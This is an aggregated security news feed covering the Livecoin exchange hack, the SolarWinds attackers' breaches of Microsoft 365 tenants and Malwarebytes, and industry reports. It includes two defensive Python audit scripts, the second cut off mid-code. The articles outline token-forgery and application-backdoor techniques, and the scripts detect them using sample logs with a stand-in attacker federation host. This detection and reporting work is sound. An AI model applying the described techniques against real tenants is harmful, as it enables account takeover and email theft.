Livecoin halted operations after the December attack

The Russian cryptocurrency exchange Livecoin has announced it is terminating its operation following the December cyberattack. 

The exchange was hacked on Christmas Eve; at the time it published a message on its website warning customers to stop using its services.

“Dear clients, we ask you to stop using our service in all meanings: don’t deposit funds, don’t trade, don’t use API. We are under a carefully planned attack, which has been prepared, as we assume, over the last few months. We lost control of all of our servers, backend and nodes. Thus, we were not able to stop our service in time.” reads the message published on the website. “Our news channels were compromised as well. At the moment, we partially control frontend, and so we’re able to place this announcement. We’re fighting hard to get back our servers, nodes and funds, we’re working 24/7. News and next update will come up in the next few days. We’re working in contact with local police authorities. We really do our best to overcome this issue.”


Livecoin told users to stop depositing funds and making transactions, and notified local law enforcement.

The administrators told customers they had lost control of the platform's servers, backend and nodes; the attack was not opportunistic and appears to have been carefully planned.

The attack took place overnight between December 23 and December 24. The attackers modified exchange rates to absurd values, around 15 times their normal levels: the Bitcoin rate was set to over $450,000/BTC, while ETH was raised from roughly $600/ETH to $15,000.

Once the exchange rates were inflated, the attackers began cashing out accounts, making huge profits.

Livecoin has now announced it is winding down following the December cyberattack.

“Dear clients, as we reported earlier, our service was under attack in December 2020. The investigation is in an active phase right now. Our service has been damaged hard in technical and financial ways. There is no way to continue operative business in these conditions, so we have taken the hard decision to close the business and pay the remaining funds to clients.” reads the announcement published by the exchange.

“Our clients have to contact us via email verification@livecoin.news to get payments after passing the verification procedure. We accept claims for payments for the next 2 months. 17 March 2021 is the last day of accepting your requests; after this date no new requests will be accepted.”

The company announced that it will accept claims for payments until 17 March 2021.

CoinTelegraph reported that some users have refused to send their personal data to Livecoin, fearing for their security and privacy. One user noted that Livecoin is requesting documents and data that could be abused by ill-intentioned parties for scams and fraud, including passport scans, residence information, high-resolution selfies, and details of the user's first transaction on the exchange.

“We apologize for an existing situation and ask you to keep calm, including your conversation with support officers. Our service and team bear hard losses as well as our clients. In case of abuse and threats in conversation, the claim can be declined.” Livecoin added.

“We have to warn you about tons of fake groups in different messengers and other channels, where people represent themselves as our team members, insiders, hackers etc. By participating in these groups you run a high risk, because we have no groups. The only official statements are made on this website. Do not send money to anyone. You don’t have to pay to get back your funds from us; the only thing you need is to send a request and follow a simple procedure.”

At the time of this writing, Livecoin’s old website domain displays the message “Oops! Time is over Livecoin….”.

As usual, some users speculate that this could be an Exit Scam.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Livecoin)

The post Livecoin halted operations after the December attack appeared first on Security Affairs.

FireEye releases an auditing tool to detect SolarWinds hackers’ activity

Cybersecurity firm FireEye has released a report that sheds the light on the SolarWinds attack and the way hackers breached its networks.


The experts explained how UNC2452 and other threat actors breached infrastructure and moved laterally from on-premises networks to the Microsoft 365 cloud. The paper, titled Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452, also provides guidance on how organizations can proactively harden their environments.

FireEye also released a tool named Azure AD Investigator that organizations can use to discover whether they have been breached by the SolarWinds hackers, tracked by the security firm as UNC2452.

The FireEye GitHub repository contains a PowerShell module that can be used to detect artifacts associated with UNC2452’s intrusion and other threat actor activity.

“Some indicators are “high-fidelity” indicators of compromise, while other artifacts are so called “dual-use” artifacts.” states FireEye. “Dual-use artifacts may be related to threat actor activity, but also may be related to legitimate functionality. Analysis and verification will be required for these.”

FireEye pointed out that the tool is read-only, which means that it does not make any changes to the Microsoft 365 environment.

The company warns that the tool may not identify a compromise in every case, and that it cannot by itself distinguish whether an artifact is the result of legitimate admin activity or threat actor activity.

Mandiant researchers explained that UNC2452 and other threat actors primarily used four techniques for lateral movement:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.
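Techniques 2, 3 and 4 all leave operations in the Azure AD audit log, which is where read-only tools of this kind look. The following Python script is an added example, not FireEye's Azure AD Investigator or CISA's Sparrow: it triages audit-log records exported as JSON lines, treating federation changes as high-fidelity, service-principal credential additions as dual-use, and role grants as dual-use unless the role handed out is Global Administrator or similarly privileged. The operation names, the record layout (activityDisplayName, initiatedBy, targetResources, modifiedProperties) and every sample record are assumptions constructed for the example; check the names against your own tenant's exports before relying on them.

```python
import json

# Operations worth reviewing, mapped to the technique numbers in the list
# above.  The mapping is this example's own; the operation strings are
# assumed to match Azure AD audit-log activityDisplayName values.
OPERATIONS = {
    "Set federation settings on domain": ("high", 2),
    "Set domain authentication": ("high", 2),
    "Add member to role": ("dual-use", 3),
    "Add service principal credentials": ("dual-use", 4),
    "Update application - Certificates and secrets management": ("dual-use", 4),
}

# Directory roles whose assignment is always escalated to high (technique 3).
PRIVILEGED_ROLES = {
    "Global Administrator",
    "Application Administrator",
    "Privileged Role Administrator",
}

# Constructed sample export (JSON lines); not taken from any real tenant.
SAMPLE_LOG = r"""
{"activityDateTime": "2020-12-15T03:11:09Z", "activityDisplayName": "Set federation settings on domain", "initiatedBy": {"user": {"userPrincipalName": "svc-sync@example.test"}}, "targetResources": [{"displayName": "example.test", "modifiedProperties": [{"displayName": "IssuerUri", "newValue": "\"http://sts.evil.test/adfs/services/trust\""}]}]}
{"activityDateTime": "2020-12-15T03:14:41Z", "activityDisplayName": "Add service principal credentials", "initiatedBy": {"user": {"userPrincipalName": "svc-sync@example.test"}}, "targetResources": [{"displayName": "Mail Protection Connector", "modifiedProperties": [{"displayName": "KeyDescription", "newValue": "\"[KeyIdentifier=constructed-sample]\""}]}]}
{"activityDateTime": "2020-12-15T03:20:02Z", "activityDisplayName": "Add member to role", "initiatedBy": {"user": {"userPrincipalName": "svc-sync@example.test"}}, "targetResources": [{"displayName": "svc-backup@example.test", "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "\"Global Administrator\""}]}]}
{"activityDateTime": "2020-12-14T09:00:00Z", "activityDisplayName": "Add member to role", "initiatedBy": {"user": {"userPrincipalName": "helpdesk@example.test"}}, "targetResources": [{"displayName": "jane@example.test", "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "\"Helpdesk Administrator\""}]}]}
{"activityDateTime": "2020-12-14T09:05:00Z", "activityDisplayName": "Update user", "initiatedBy": {"user": {"userPrincipalName": "helpdesk@example.test"}}, "targetResources": [{"displayName": "jane@example.test"}]}
"""


def _modified_property(record, name):
    """Return the decoded newValue of a modifiedProperties entry.
    Azure AD stores newValue as a JSON-encoded string (assumed format)."""
    for target in record.get("targetResources", []):
        for prop in target.get("modifiedProperties", []):
            if prop.get("displayName") == name:
                raw = prop.get("newValue")
                try:
                    return json.loads(raw)
                except (TypeError, ValueError):
                    return raw
    return None


def _initiator(record):
    """Who performed the operation: a user's UPN or an app's display name."""
    by = record.get("initiatedBy") or {}
    user = by.get("user") or {}
    app = by.get("app") or {}
    return user.get("userPrincipalName") or app.get("displayName") or "unknown"


def classify(record):
    """Return (severity, technique) for one audit record, or None if it is
    not one of the operations this triage cares about."""
    hit = OPERATIONS.get(record.get("activityDisplayName", ""))
    if hit is None:
        return None
    severity, technique = hit
    # A role grant is dual-use in general, but handing out a privileged
    # directory role is exactly what technique 3 relies on.
    if technique == 3 and _modified_property(record, "Role.DisplayName") in PRIVILEGED_ROLES:
        severity = "high"
    return severity, technique


def triage(lines):
    """Parse JSON-lines audit records and return findings, high-fidelity
    first and oldest first within each severity."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        hit = classify(record)
        if hit is None:
            continue
        severity, technique = hit
        findings.append({
            "time": record.get("activityDateTime"),
            "severity": severity,
            "technique": technique,
            "operation": record["activityDisplayName"],
            "initiator": _initiator(record),
            "targets": [t.get("displayName") or t.get("id") or "?"
                        for t in record.get("targetResources", [])],
        })
    findings.sort(key=lambda f: (f["severity"] != "high", f["time"] or ""))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG.splitlines()):
        print(f"{finding['severity']:8} T{finding['technique']} {finding['time']} "
              f"{finding['operation']} by {finding['initiator']} -> {', '.join(finding['targets'])}")
```

Run against the constructed sample, the federation change and the Global Administrator grant surface first as high-fidelity hits, while the new service-principal credential and the helpdesk role grant come out as dual-use and still need the manual verification FireEye describes. Technique 1, the theft of the AD FS token-signing certificate, produces none of these operations and has to be investigated on the AD FS servers themselves.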

The Cybersecurity and Infrastructure Security Agency (CISA)’s Cloud Forensics team has also released a PowerShell-based tool, dubbed Sparrow, that helps administrators detect anomalies and potentially malicious activity in Azure/Microsoft 365 environments.

CrowdStrike also built its own tool after running into difficulties using Azure’s administrative tools to enumerate the privileges assigned to third-party resellers and partners in its Azure tenant.

“CrowdStrike launches CrowdStrike Reporting Tool for Azure (CRT), a free community tool that will help organizations quickly and easily review excessive permissions in their Azure AD environments, help determine configuration weaknesses, and provide advice to mitigate risk.” states the security firm.

“Throughout our analysis, we experienced first hand the difficulties customers face in managing Azure’s administrative tools to know what relationships and permissions exist within Azure tenants, particularly with third-party partner/resellers, and how to quickly enumerate them. We found it particularly challenging that many of the steps required to investigate are not documented, there was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible.”

The CrowdStrike Reporting Tool for Azure (CRT) can be used by administrators to analyze their Microsoft Azure environment and review the privileges assigned to third-party resellers and partners.


Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds APT)

The post FireEye releases an auditing tool to detect SolarWinds hackers’ activity appeared first on Security Affairs.

Retail and Hospitality Facing Deluge of Critical Web App Flaws


More than three-quarters of applications in the retail and hospitality sector contain at least one vulnerability, with a high percentage of these requiring urgent attention, according to Veracode.

The application security vendor analyzed more than 130,000 applications to compile its latest State of Software Security report.

However, while the 76% of buggy apps in the retail and hospitality sector is about average compared to other verticals, Veracode warned that 26% are high severity — one of the worst rates of any industry.

This matters, as the industry has been delivering a raft of new applications in order to reach customers online during the pandemic, amid social distancing and lockdowns. It’s especially important to hospitality firms, which have been forced to radically reshape their business models to adapt to the new reality.

Yet while web applications can be a life-saver for such businesses, they might also introduce extra cyber-risk. They were involved in 43% of breaches analyzed by Verizon last year and were the number one attack vector for the retail industry, with personal or payment data exploited in about half of all breaches.

That said, retail and hospitality ranked second-best for overall fix rate, according to Veracode. Half of its flaws were remediated in 125 days, which is nearly one month faster than the next-fastest sector.

Veracode claimed that, although retail and hospitality firms did well at addressing common flaw types like information leakage and input validation, developers struggled with encapsulation, SQL injection and credentials management issues.

“Retail and hospitality companies face the dual pressure of being high-value targets for attackers while also requiring software that allows them to be highly responsive to customers and compliant with industry regulations such as PCI,” said Chris Eng, Veracode chief research officer.

“Using API-driven scanning and software composition analysis to scan for flaws in open source components offer the best opportunity for improvement for development teams in the sector.”

Sophisticated Watering Hole Attack

Google’s Project Zero has exposed a sophisticated watering-hole attack targeting both Windows and Android:

Some of the exploits were zero-days, meaning they targeted vulnerabilities that at the time were unknown to Google, Microsoft, and most outside researchers (both companies have since patched the security flaws). The hackers delivered the exploits through watering-hole attacks, which compromise sites frequented by the targets of interest and lace the sites with code that installs malware on visitors’ devices. The boobytrapped sites made use of two exploit servers, one for Windows users and the other for users of Android

The use of zero-days and complex infrastructure isn’t in itself a sign of sophistication, but it does show above-average skill by a professional team of hackers. Combined with the robustness of the attack code — which chained together multiple exploits in an efficient manner — the campaign demonstrates it was carried out by a “highly sophisticated actor.”

[…]

The modularity of the payloads, the interchangeable exploit chains, and the logging, targeting, and maturity of the operation also set the campaign apart, the researcher said.

No attribution was made, but the list of countries likely to be behind this isn’t very large. If you were to ask me to guess based on available information, I would guess it was the US — specifically, the NSA. It shows a care and precision that it’s known for. But I have no actual evidence for that guess.

All the vulnerabilities were fixed by last April.

Cyber Security Today – Why good passwords aren’t enough, COVID vaccine documents altered in hack, and intimate photos found unprotected.

Today's podcast reports on the hack of a software firm's forum administrator account, COVID vaccine documents altered in a hack, intimate photos from a discontinued app found unprotected, and a warning about dating apps.

The post Cyber Security Today – Why good passwords aren’t enough, COVID vaccine documents altered in hack, and intimate photos found unprotected. first appeared on IT World Canada.

Malwarebytes: SolarWinds Hackers Read Our Emails


Malwarebytes has confirmed that the SolarWinds attackers managed to access internal emails, although via a different intrusion vector to many victims.

While many of the organizations caught up in the suspected Russian cyber-espionage campaign were compromised via a malicious SolarWinds Orion update, US government agency CISA had previously pointed to a second threat vector. This involved use of password guessing or spraying and/or exploiting inappropriately secured admin or service credentials.

The security vendor said attackers abused applications with privileged access to Microsoft Office 365 and Azure environments.

“We received information from the Microsoft Security Response Center on December 15 about suspicious activity from a third-party application in our Microsoft Office 365 tenant consistent with the tactics, techniques and procedures (TTPs) of the same advanced threat actor involved in the SolarWinds attacks,” the vendor explained.

“The investigation indicates the attackers leveraged a dormant email protection product within our Office 365 tenant that allowed access to a limited subset of internal company emails. We do not use Azure cloud services in our production environments.”

Malwarebytes clarified that it found no evidence of unauthorized access or compromise in any of its on-premises or production environments.

The news comes as FireEye released a new report detailing the various ways the SolarWinds attackers moved laterally to the Microsoft 365 cloud after gaining an initial foothold in networks.

They include: stealing an Active Directory Federation Services (AD FS) token-signing certificate and using it to forge tokens for arbitrary users, compromising credentials of highly privileged on-premises accounts synced to Microsoft 365 and modifying/adding trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls.

The attackers also backdoored existing Microsoft 365 apps by adding a new application or service principal credential. This enabled them to use the legitimate permissions assigned to the application, such as reading emails, FireEye said.

The security vendor has joined CrowdStrike and CISA in releasing a new tool which will help organizations spot if their Microsoft 365 tenants have been subject to the same techniques used by the group.

Malwarebytes was breached by the SolarWinds attackers

A fourth malware strain wielded by the SolarWinds attackers has been detailed by Symantec researchers, followed by the disclosure of the attackers’ ingenious lateral movement techniques and the release of an auditing script by FireEye researchers that organizations can use to check their Microsoft 365 tenants for signs of intrusion. Then, on Tuesday, Malwarebytes CEO Marcin Kleczynski disclosed that the same attackers targeted and breached the company, but not through the compromised SolarWinds Orion platform … More

The post Malwarebytes was breached by the SolarWinds attackers appeared first on Help Net Security.

Google Details Patched Bugs in Signal, FB Messenger, JioChat Apps

In January 2019, a critical flaw was reported in Apple's FaceTime group chats feature that made it possible for users to initiate a FaceTime video call and eavesdrop on targets by adding their own number as a third person in a group chat even before the person on the other end accepted the incoming call. The vulnerability was deemed so severe that the iPhone maker removed the FaceTime group

How to Report Email Fraud: Learn What to Do If It Happens to You

Have you, a colleague or a friend ever received a suspicious email? It is of paramount importance to know how to report email fraud in order to avoid all the unpleasant consequences that might come from it, especially if we’re talking about the compromise of your business email – revenue loss, data breach, reputation damage, […]

The post How to Report Email Fraud: Learn What to Do If It Happens to You appeared first on Heimdal Security Blog.

Quarter of Orgs Don’t Offer Cybersecurity Training Due to Lack of Budget


A quarter (25%) of company directors are prevented from delivering cybersecurity training to staff by budgetary constraints, according to iomart’s Cybersecurity Insights Report.

The survey of UK-based workers across C-level, director, manager and employee level, found that 28% of businesses offer no cybersecurity training whatsoever. Additionally, 42% said that whilst some training was offered by their firm, it was only available to select staff, while over two-thirds (70%) of respondents revealed their company doesn’t provide training to all employees.

Of those that confirmed they did receive training, 82% admitted this only consisted of a short briefing rather than a comprehensive course, with just 17% receiving regular sessions related to cybersecurity.

iomart therefore calculated that less than one in 10 (8%) of those who took part in the survey received regular cybersecurity training.

The study also found that a quarter (25%) of businesses do not have a disaster recovery policy, while a further 31% said there was one but they had never tested it.

These findings are especially concerning given that 20% of respondents reported they had seen an increase in cyber-attacks as a result of remote working, which has expanded enormously since the start of the COVID-19 pandemic.

Although company directors cited budget as the main factor in not delivering cybersecurity training, other factors highlighted by all respondents were a lack of technical expertise within the business (8%) and the issue not being a main priority (5%).

Bill Strain, security director of iomart, commented: “It’s clear that many organizations still don’t consider cybersecurity and data protection to be a top priority.

“They need to understand what the potential threats are and build resilience into their business strategy so they can react quickly and maintain operations if their IT systems are compromised.

“Many businesses would not survive the operational – let alone financial – impact of a data breach. By understanding the potential risk and introducing positive behavior around cyber-awareness, they have a much better chance of surviving an incident.”

In a survey at the end of last year, a third of remote working employees said they had not received security training in the last six months.

Hashtag Trending – Parler survives; FBI looks into stolen laptop from Capitol assault; Empty Toronto office

Parler is partially running again with the help of a Russian tech firm, the FBI looks into a stolen laptop from the Capitol assault, and office vacancies in downtown Toronto are on a rise.

The post Hashtag Trending – Parler survives; FBI looks into stolen laptop from Capitol assault; Empty Toronto office first appeared on IT World Canada.

Coin-Mining Malware Volumes Soar 53% in Q4 2020


Detections of crypto-mining malware surged by 53% quarter-on-quarter in the final three months of 2020 as the value of Bitcoin soared, according to Avira.

The price of one Bitcoin now stands at over $35,500, close to an all-time-high it hit earlier this month, according to the security vendor’s Avira Protection Labs.

"The rapid increase in coin-miner malware suggests that malware authors are taking advantage of the price trend in recent months and increasingly spreading malware that aims to exploit other people’s computer resources for illegal mining activities,” argued Alexander Vukcevic, director of Avira Protection Labs.

“This correlation is not surprising but is nevertheless worrying for legitimate miners and investors.”

Crypto-mining or crypto-jacking came of age in 2017 and 2018 as cyber-criminals sought a quick and easy way to monetize attacks. It was claimed at the time that because attacks didn’t require user interaction to start generating profits for the perpetrator, many would-be ransomware groups were pivoting to the new threat.

Avira listed three main types of coin-mining malware today: executable files, browser-based cryptocurrency miners and advanced fileless miners.

It was the browser-based Coinhive that drove the previous spike in cryptocurrency-mining activity. By February 2018 it had impacted 23% of global organizations, according to one study. One researcher even found it installed on UK and US government sites including those belonging to the UK’s Information Commissioner’s Office (ICO), United States Courts, the General Medical Council, the UK’s Student Loans Company and NHS Inform.

Coinhive shut down in February 2019, but the practice appears to be spiking again alongside the value of digital currency.

Chris Sedgwick, security operations director, Sy4Security, argued that it is the lesser-known Monero currency rather than Bitcoin that’s in high demand.

“The reason why the majority of cryptocurrency malware mines Monero instead of Bitcoin is that the mining requirements for Monero are a fraction of those required for Bitcoin,” he said.

“Monero is also favored over Bitcoin amongst those individuals looking to use their gains for illegal use as there is no tracking of transactions and the Blockchain is not transparent.”

How your staff make security decisions: The psychology of information security

Your employees encounter potential cyber security threats on a daily basis. Perhaps there’s a new face in the office that they don’t recognise, or a new password they need to remember, or a database of sensitive information that they need to upload onto the Cloud.

In The Psychology of Information Security, Leron Zinatullin explains how employees respond to those challenges and explains why they make the decisions they do.

For example, he found that employees usually don’t have a solid understanding of information security or their obligations to protect information.

In the rare cases where employees are aware of and follow a security policy, they don’t appreciate why those rules are in place.


The cost of compliance is too high

The majority of employees within an organisation are hired to execute specific jobs, such as marketing, managing projects, and manufacturing goods.

Therefore, an employee’s main priority is often to ensure efficient completion of their core business activity, and information security will usually only be a secondary activity.

Zinatullin found that, when security mechanisms cause additional workload, employees will favour non-compliant behaviour in order to complete their primary tasks quickly.

The means of compliance are obstructive

Sometimes, employees are unable to comply even if they are willing because the security mechanisms of the organisation do not match their basic requirements.

Examples include an organisation giving employees encrypted USB drives with too little storage space, forcing them to share files via email or non-encrypted drives.

Another problem is having to use multiple passwords to access multiple systems. Users normally resolve this problem by writing down their passwords.

Want to know more?

The information in this blog was taken from Leron Zinatullin’s The Psychology of Information Security.

Use this book to understand your employee’s behaviour and resolve security-related conflicts.

It contains insights gained from academic research, as well as interviews with UK-based security professionals from various sectors, and will help you develop a security programme that accounts for human weaknesses and your wider business objectives.


A version of this blog was originally published on 6 February 2017.

The post How your staff make security decisions: The psychology of information security appeared first on IT Governance UK Blog.

Does your cloud stack move faster than your cloud security solutions?

According to Gartner, worldwide end-user spending on public cloud services is forecasted to grow by 18.4% in 2021 to a total of $304.9 billion, up from $257.5 billion in 2020. “The pandemic validated the cloud’s value proposition,” said Sid Nag, research vice president at Gartner. “The ability to use on-demand, scalable cloud models to achieve cost efficiency and business continuity is providing the impetus for organizations to rapidly accelerate their digital business transformation plans.” From … More

The post Does your cloud stack move faster than your cloud security solutions? appeared first on Help Net Security.

Protecting the remote workforce to be enterprises’ prime focus in 2021

Protecting the remote workforce will be enterprises’ prime focus in 2021, according to a Cato Networks survey of 2,376 IT leaders. IT teams struggled in the early days of the pandemic, rushing to meet the urgent need for widespread remote access. Connecting users often came at the expense of other factors, such as security, performance, and management. As 81% of respondents expect to continue working-from-home (WFH), 2021 will see enterprises address those other areas, evolving … More

The post Protecting the remote workforce to be enterprises’ prime focus in 2021 appeared first on Help Net Security.

Anti-Virus

Make sure you have anti-virus software installed on your computer and that it is automatically updating. However, keep in mind that no anti-virus can catch all malware; your computer can still be infected. That is why it's so important you use common sense and be wary of any messages that seem odd or suspicious.

SolarWinds Hackers Also Breached Malwarebytes Cybersecurity Firm

Malwarebytes on Tuesday said it was breached by the same group who broke into SolarWinds to access some of its internal emails, making it the fourth major cybersecurity vendor to be targeted after FireEye, Microsoft, and CrowdStrike. The company said its intrusion was not the result of a SolarWinds compromise, but rather due to a separate initial access vector that works by "abusing applications

Companies turning to MSPs as attack vectors get more sophisticated

Research from Infrascale reveals new information security insights important to MSPs in the new year. The research survey highlights business executive input, from a security perspective, on COVID-19, on cloud adoption, and on standards compliance. As 65% of those surveyed have seen an increase in information security breaches in their industry since the pandemic began, it’s not surprising that even more, 74% of all respondents, have chosen caution and implemented new infosec technology. A robust … More

The post Companies turning to MSPs as attack vectors get more sophisticated appeared first on Help Net Security.

Improving Your Security Posture with the Pipeline Cybersecurity Initiative

A few years ago, I worked alongside some oil commodity traders. Environmental concerns aside, I never realized how many parts were required to get the oil out of the ground, not to mention everything else that finally resulted in the production of refined products that surround our lives. As a cybersecurity professional, I was more interested […]… Read More

The post Improving Your Security Posture with the Pipeline Cybersecurity Initiative appeared first on The State of Security.

Data Classification Is Data Storage

‘Business’ is a verb that practically means the movement of data. If you aren’t sharing data – keeping the books, sharing ideas and stats about sales, getting the correct information regarding the customer or data to the customer – then you aren’t doing much business. But organizations need to protect their data along the way. […]… Read More

The post Data Classification Is Data Storage appeared first on The State of Security.

Research team develops fast and affordable quantum random number generator

An international research team has developed a fast and affordable quantum random number generator. The device created by scientists from NUST MISIS, Russian Quantum Center, University of Oxford, Goldsmiths, University of London and Freie Universität Berlin produces randomness at a rate of 8.05 gigabits per second, which makes it the fastest random number generator of its kind. The study is a promising starting point for the development of commercial random number generators for cryptography and … More

The post Research team develops fast and affordable quantum random number generator appeared first on Help Net Security.

DataLocker releases encrypted USB drive with capacities up to 15.3 TB

DataLocker announced the release of an entirely new breed of encrypted USB drive. The DL4 FE changes the game for security professionals by providing bulletproof security and simple remote management in a small-form-factor USB drive with capacities up to 15.3 TB. “The onslaught of attacks by state actors, hackers, and cyber cartels continues. Threat actors are trying to exfiltrate terabytes of data to hold for ransom. Some want access to essential IT systems for later … More

The post DataLocker releases encrypted USB drive with capacities up to 15.3 TB appeared first on Help Net Security.

Cyber Observer enhances its platform with unified visibility of security tool effectiveness

Cyber Observer announced a major enhancement to its platform that enables CISOs and other security and risk management executives to obtain new, continuous, unified visibility into the effectiveness of cybersecurity tools that are implemented throughout their enterprise. By continuously retrieving and analyzing Critical Security Controls (CSCs) from applications on-premises and in-cloud, Cyber Observer’s CCM platform simplifies compliance, reduces mean time to detection and response, and advances risk posture management. Cybersecurity teams are overwhelmed with complexity … More

The post Cyber Observer enhances its platform with unified visibility of security tool effectiveness appeared first on Help Net Security.

Rancher’s platform for managed Kubernetes now available through BoxBoat’s MAS contract with the GSA

BoxBoat announced that Rancher Federal’s enterprise platform for managed Kubernetes is now available through BoxBoat’s Multiple Award Schedule contract with the General Services Administration (GSA). This expansion of BoxBoat’s relationship with Rancher Federal will enable government agencies to take greater advantage of Rancher’s support for certified Kubernetes distribution, either on-premise or in the public cloud. As agencies adopt Kubernetes and DevSecOps, Rancher provides audited and US-validated distributions of critical open-source products necessary to deliver cutting-edge … More

The post Rancher’s platform for managed Kubernetes now available through BoxBoat’s MAS contract with the GSA appeared first on Help Net Security.

Netskope NewEdge network now expanded to a new data center in Singapore

Netskope announced the expansion of the Netskope NewEdge network to a new data center in Singapore. Serving millions of enterprise users around the world, Netskope NewEdge is a carrier-grade private cloud network that is reserved exclusively for Netskope customers. The expansion of the Singapore data center enhances the NewEdge infrastructure, building on Netskope’s investment in the region to better serve local and multinational customers. Trustwave, a Singtel company and the global security arm of Singtel, … More

The post Netskope NewEdge network now expanded to a new data center in Singapore appeared first on Help Net Security.

McAfee partners with ECS to offer MDR capabilities through MVISION EDR

McAfee announced that it is partnering with ECS to offer managed threat detection and response (MDR) capabilities through McAfee MVISION EDR. ECS is the first North American MDR partner for McAfee MVISION EDR and will leverage MVISION EDR and supporting vendors to deliver a scalable, repeatable and customizable program that enables organizations to focus on only verified threats. MDR solutions can help organizations by alleviating the customer challenges associated with alert fatigue, false positives, inexperienced … More

The post McAfee partners with ECS to offer MDR capabilities through MVISION EDR appeared first on Help Net Security.

uCloudlink signs agreement with CVITC to develop smart container solutions powered by Cloud SIM

uCloudlink has inked a Strategic Cooperation Framework Agreement with China Vehicle Interconnected Transport Capacity Technology (“CVITC”). The partnership will see both companies develop innovative smart container solutions for domestic and international freight markets powered by uCloudlink’s core patented Cloud SIM technology which accelerates the development of the global container transportation industry. The advent of container shipping has dramatically improved cargo transportation efficiency around the world. Despite this, this shipping method is often hazardous, and there … More

The post uCloudlink signs agreement with CVITC to develop smart container solutions powered by Cloud SIM appeared first on Help Net Security.

Tanium collaborates with OpenCTI to help orgs increase their threat detection capabilities

Tanium has announced a collaboration with OpenCTI, an open source platform which specialises in the analysis of cyber threats. The collaboration will allow the integration of Tanium’s behavior-based detection offering, Tanium Signals, with OpenCTI, helping organizations to store, organize and visualise intelligence information in real-time. The Tanium-OpenCTI connector is now ready for production use and available to all Tanium customers. The ability to collect and analyse Cyber Threat Intelligence (CTI) is critical, as cyber teams … More

The post Tanium collaborates with OpenCTI to help orgs increase their threat detection capabilities appeared first on Help Net Security.

Swimlane raises $40M to accelerate partnerships and alliances, expand research and development

Swimlane announced it has raised $40 million in funding led by EIP. This funding will accelerate partnerships and alliances, expand research and development, and enable further global expansion. Additionally, Swimlane has appointed James Brear as Chief Executive Officer, who was previously CEO of Veriflow, which was sold to VMWare in August 2019. Industry visionary and Senior Operating Partner at EIP, Niloofar Howe, has also been named as the company’s newest board member. “Without a doubt, … More

The post Swimlane raises $40M to accelerate partnerships and alliances, expand research and development appeared first on Help Net Security.

Impartner appoints Robert Reid to its board of directors

Impartner announced it has appointed Robert Reid to the company’s board of directors. Reid is chairman of Mid-Market Solutions for Sage, the market leader in cloud business management solutions. Prior to Sage, Reid was CEO of Intacct (which was acquired by Sage), LucidEra, UpShot and Seeker Software. A respected thought leader in the software-as-a-service (SaaS) industry, Reid has won multiple CEO leadership awards, including Best CEO in the Financials Industry, CEO of the year for … More

The post Impartner appoints Robert Reid to its board of directors appeared first on Help Net Security.

Malwarebytes’ email systems hacked by SolarWinds attackers

Cyber security firm Malwarebytes announced that the threat actor behind the SolarWinds attack also breached its network last year.

Malwarebytes revealed today that the SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms hit by the SolarWinds attackers, after FireEye, Microsoft, and CrowdStrike.

The intrusion took place last year. The company pointed out that the hackers used a different attack vector: Malwarebytes does not use SolarWinds Orion software.

The intruders gained access to a limited set of internal emails by abusing applications with privileged access to the company’s Microsoft Office 365 and Azure environments.

“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by Malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”

Malwarebytes learned of the intrusion from the Microsoft Security Response Center (MSRC) on December 15, when Microsoft warned it of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.

With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes determined that the attackers leveraged a dormant email protection product within its Office 365 tenant, which gave them access to a limited subset of internal company emails. The security firm noted that it does not use Azure cloud services in its production environments.
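The vector Malwarebytes describes, a forgotten application that still holds app-only mailbox permissions and quietly gets a new credential, is something a tenant owner can audit for. The following Python is an added example, not Malwarebytes’ or Microsoft’s tooling: it walks a constructed inventory of applications (names, dates and the permission strings are made up for the example, though the permission names follow the app-only mailbox permission model) and flags apps that were silent for months and then started signing in again, apps that received a fresh client secret or certificate, and apps that are dormant but still privileged. In a real tenant the same fields come from the identity provider’s application, sign-in and audit logs.

```python
"""Audit tenant apps for dormant or reactivated privileged mail access (added example).

Not Malwarebytes' or Microsoft's tooling. The inventory below is constructed;
permission names are illustrative of app-only (application) mailbox
permissions and are not a complete list.
"""
from dataclasses import dataclass
from datetime import date

MAIL_PRIVILEGED = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "full_access_as_app"}
AS_OF = date(2020, 12, 15)  # constructed "today" for the sample run


@dataclass
class AppRecord:
    name: str
    app_permissions: set   # application permissions granted (no user context)
    sign_ins: list         # dates on which the app itself obtained a token
    credentials: list      # (date_added, added_by) per client secret or certificate


@dataclass
class Finding:
    app: str
    severity: str
    reason: str


def longest_silence(sign_ins):
    """Return (gap_days, date_resumed) for the longest gap between sign-ins."""
    days = sorted(sign_ins)
    best = (0, None)
    for earlier, later in zip(days, days[1:]):
        gap = (later - earlier).days
        if gap > best[0]:
            best = (gap, later)
    return best


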